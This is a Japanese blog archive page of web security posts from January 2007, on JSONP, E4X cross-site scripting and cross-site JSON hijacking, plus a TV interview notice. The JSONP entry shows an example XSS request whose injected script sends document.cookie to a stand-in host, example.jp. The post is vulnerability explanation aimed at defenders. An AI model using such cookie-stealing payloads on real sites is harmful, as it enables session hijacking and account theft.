« 2006年12月 | メイン | 2007年02月 »
2007年01月15日
「スーパー技術者争奪戦」
ワールドビジネスサテライトの取材が、サイボウズ (本社とラボ?) に入りました。
スーパー技術者争奪戦デジタル機器の開発に関わる技術者の争奪戦が過熱している。各社ともウィンドウズビズタ発売前に新型パソコンを発表するが、その開発の裏にスーパークリエーターという技術者が。技術者の新たな活用で何か変わるか取材。
www.tv-tokyo.co.jp
私は、今なにをやっているのかということで Japanize のことや、サイボウズ・ラボで働くことの意味、といったことを話しました。
ちなみに、今夜 (2007/1/15 23:00-) 放送だそうです。電波に乗るといいな。
投稿者 kazuho : 2007年01月15日 11:29 | コメント (1) | トラックバック (2)
2007年01月12日
JSONP - データ提供者側のセキュリティについて
JSONP のセキュリティは、ともすればインクルードする側についての議論になりがちであり、その影でインクルードされる側のリスクが見過ごされがちです。JSONP の使用にあたっては、データ提供者への XSS に注意する必要があります。脆弱な例としては、以下のようなものがあります。
GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript; charset=utf-8 <script>location='http://example.jp/'+document.cookie</script>({ ... })
この例の URL を Internet Explorer で直接アクセスすると、クエリ文字列から注入されたスクリプトが実行され、example.com のクッキーが example.jp によって詐取されます。なぜそうなるのでしょう?
続きを読む "JSONP - データ提供者側のセキュリティについて "
投稿者 kazuho : 2007年01月12日 15:05 | コメント (3) | トラックバック (1)
2007年01月10日
E4X-XSS 脆弱性について
Firefox でサポートされている JavaScript 拡張 E4X (ECMA-357) では、JavaScript 内に XML とほぼ同様のマークアップ言語を記述できるようになっています。しかし、マークアップ言語の解釈にはいくつかの違いがあり、この点をついたクロスサイトスクリプティングの可能性が (相当に小さいものの) 存在します。攻撃者は、
- ウェブアプリケーションに E4X として解釈した場合に実行コードとして解釈されるコードを注入 (XSS) し、
- 1 のコンテンツを <script> タグを用いて参照するような別のウェブサイトを用意し、攻撃対象にアクセスさせる (受動的攻撃)
投稿者 kazuho : 2007年01月10日 12:37 | トラックバック (1)
2007年01月06日
安全な JSON, 危険な JSON (Cross-site Including?)
先のエントリで、
JSON については、JavaScript として副作用をもたない (もたせようがない) ゆえに
(Kazuho@Cybozu Labs: クロスサイトのセキュリティモデル)文法違反であるがゆえに、秘密情報を含むデータフォーマットとして使用することができるのです。
と書いたのですが、認識が甘かったようです。Jeremiah Grossman: Advanced Web Attack Techniques using GMail によると、配列の初期化演算子 [] の動作を外部から変更することができる注1とのこと。
実際に手元の Firefox 1.5 で試してみたところ、JSON データが配列として返される場合は、サイトをまたいで参照できるようです。コードは下記のとおり。
続きを読む "安全な JSON, 危険な JSON (Cross-site Including?)"
投稿者 kazuho : 2007年01月06日 10:07 | トラックバック (0)
2007年01月04日
クロスサイトのセキュリティモデル
あけましておめでとうございます。
昨年、社内で「XMLHttpRequest は何故クロスサイトで使えないのか。画像や SCRIPT タグは使えるのに」という疑問 (というより試問) を耳にしました。おもしろい話なのでブログネタにしようと思っていたのですが、新年早々 GMAIL の事例がスラッシュドットされていたので、自分の現時点での理解をまとめてみることにしました。文書を確認して書いているわけではないので、間違いがあれば指摘してください。また、よい参考文献をご存知の方がいらっしゃいましたら、教えていただければ幸いです。
投稿者 kazuho : 2007年01月04日 11:40 | トラックバック (2)